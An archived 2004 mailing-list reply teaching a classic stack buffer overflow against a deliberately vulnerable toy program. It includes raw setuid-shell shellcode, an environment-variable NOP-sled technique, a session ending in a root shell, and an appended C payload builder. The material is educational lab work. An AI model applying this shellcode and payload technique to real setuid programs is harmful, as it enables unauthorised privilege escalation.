Security Basics mailing list archives

RE: Buffer Overflow problem


From: Shaun Colley <shaunige () yahoo co uk>
Date: Sat, 8 May 2004 08:24:28 +0100 (BST)

Hi,

The problem is incorrect padding. I'll try explaining, but keep in mind that
I believe Krzysztof to be correct on this one.  You
need to write far enough past the buffer for your
address to reach EIP.

Try exploiting a program like this:

--- vuln.c ---
#include <stdio.h>
#include <string.h>     /* strcpy() */

int main(int argc, char *argv[]) {
        char buf[5];

        /* deliberately unbounded copy: an argv[1] longer than
           buf overwrites the saved EIP further up the stack */
        strcpy(buf, argv[1]);

        return(0);  /* shouldn't get here if we overflow buf */
}
--- EOF ---

Due to calculations, I happen to know that you would
need to overwrite 28 bytes past 'buf' to hit the EIP
register.  Try something like this:

--- example ---
[shaun@localhost tmp]$ perl -e 'print "\x90"x50 . "\x31\xdb\x53\x8d\x43\x17\xcd\x80\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"' > shell
[shaun@localhost tmp]$ export HACK=`cat shell`
[shaun@localhost tmp]$ ./gtev HACK
HACK is stored at address 0xbffffa56
[shaun@localhost tmp]$ ./vuln `perl -e 'print "HACK"x7 . "\x56\xfa\xff\xbf"'`
sh-2.05b# exit
exit
[shaun@localhost tmp]$ ./vuln `perl -e 'print "\x56\xfa\xff\xbf"x50'`
sh-2.05b# exit
exit
[shaun@localhost tmp]$
--- EO example ---

Using the environment-variable method to store
shellcode and NOP sleds makes your job
substantially easier.  By the way, gtev.c is below
(the program I used to get the address of $HACK):

--- gtev.c ---
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {
        char *addr_ptr;

        if(argc < 2) {
                printf("Usage: %s <environ_var>\n", argv[0]);
                exit(-1);
        }

        /* getenv() returns a pointer into this process's own
           environment block on the stack; the target program
           inherits the same environment, so the address is
           reused as the return address in the overflow */
        addr_ptr = getenv(argv[1]);

        if(addr_ptr == NULL) {
                printf("Environment variable %s does not exist!\n", argv[1]);
                exit(-1);
        }

        printf("%s is stored at address %p\n", argv[1], addr_ptr);
        return(0);
}
--- EOF ---

I'm far from being an expert too, but remember this:
it's only as hard as you make it.  It's only, in
reality, a simple matter of placing some code in
memory, obtaining the address of that code, and then
overflowing the vulnerable buffer, thereby placing
your shellcode's address in EIP - thus your code is
executed.



Thank you for your time.
Shaun.
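The two ./vuln invocations above both boil down to the same payload: some filler to reach the saved EIP, then the address of $HACK written as little-endian bytes. The following is an added example (not code from Shaun's message) that builds that string programmatically and checks the two things that most often make such a payload fail silently: a NUL byte in the address, which stops strcpy() before the address is written, and a payload that does not fit. It also carries the conventional correction for the environment-variable trick when the helper program's name (here ./gtev) is not the same length as the target's (./vuln): the program name sits on the stack twice above the environment strings (the filename copied by the kernel and the _= variable bash exports), so the variable shifts by twice the length difference. That explanation and the adjust_env_addr() function are an assumption about the 32-bit x86 Linux layout of the post, not something the post states; the 28-byte offset and 0xbffffa56 are the post's own numbers.

```c
/* payload.c: build the overflow string passed to ./vuln.
 * Added example, not from the original post. Assumes 32-bit x86 Linux
 * as in the post: little-endian, 4-byte saved EIP, payload copied with
 * strcpy(), so it must contain no 0x00 byte. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

/* Write a 32-bit address as the 4 little-endian bytes x86 expects. */
static void pack_le32(uint32_t v, unsigned char out[4])
{
    out[0] = v & 0xff;
    out[1] = (v >> 8) & 0xff;
    out[2] = (v >> 16) & 0xff;
    out[3] = (v >> 24) & 0xff;
}

/* Fill `out` with `offset` filler bytes followed by `repeat` copies of
 * ret_addr ("HACK"x7 . addr is offset=28, repeat=1; addr x50 is
 * offset=0, repeat=50). Returns the payload length, or 0 if it would
 * not fit in `out` or the address contains a NUL byte: strcpy() stops
 * at the first NUL, so that payload would never reach the saved EIP. */
size_t build_payload(unsigned char *out, size_t outlen, size_t offset,
                     uint32_t ret_addr, unsigned repeat)
{
    unsigned char addr[4];
    size_t total = offset + 4u * repeat;
    unsigned i;

    if (repeat == 0 || total > outlen)
        return 0;
    pack_le32(ret_addr, addr);
    for (i = 0; i < 4; i++)
        if (addr[i] == 0)
            return 0;               /* NUL byte would truncate the copy */

    memset(out, 'A', offset);       /* filler up to the saved EIP */
    for (i = 0; i < repeat; i++)
        memcpy(out + offset + 4u * i, addr, 4);
    return total;
}

/* Address of an environment variable as the target will see it, given
 * the address a helper such as gtev printed. Assumption (the usual
 * getenvaddr correction, not stated in the post): the program name
 * appears twice above the environment strings, so the variable moves
 * by 2 * (len(helper argv[0]) - len(target argv[0])). With ./gtev and
 * ./vuln both 6 characters, no correction is needed. */
uint32_t adjust_env_addr(uint32_t helper_addr, const char *helper_argv0,
                         const char *target_argv0)
{
    long diff = (long)strlen(helper_argv0) - (long)strlen(target_argv0);
    return helper_addr + (uint32_t)(2 * diff);
}

int main(void)
{
    unsigned char payload[256];
    /* The post's numbers: 28 bytes to EIP, $HACK at 0xbffffa56 */
    uint32_t target = adjust_env_addr(0xbffffa56u, "./gtev", "./vuln");
    size_t n = build_payload(payload, sizeof payload, 28, target, 1);
    size_t i;

    if (n == 0) {
        fprintf(stderr, "payload rejected (NUL byte or too long)\n");
        return 1;
    }
    /* Emit the raw bytes; redirect to a file and run ./vuln "$(cat file)" */
    for (i = 0; i < n; i++)
        putchar(payload[i]);
    return 0;
}
```

Note that rejecting addresses with a NUL byte is exactly why 0xbffffa56 works where an address like 0xbffff000 would not, and why the post's second form (the address repeated 50 times) needs no separate filler: every 4-byte slot past the buffer, including the saved EIP, receives the same address.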
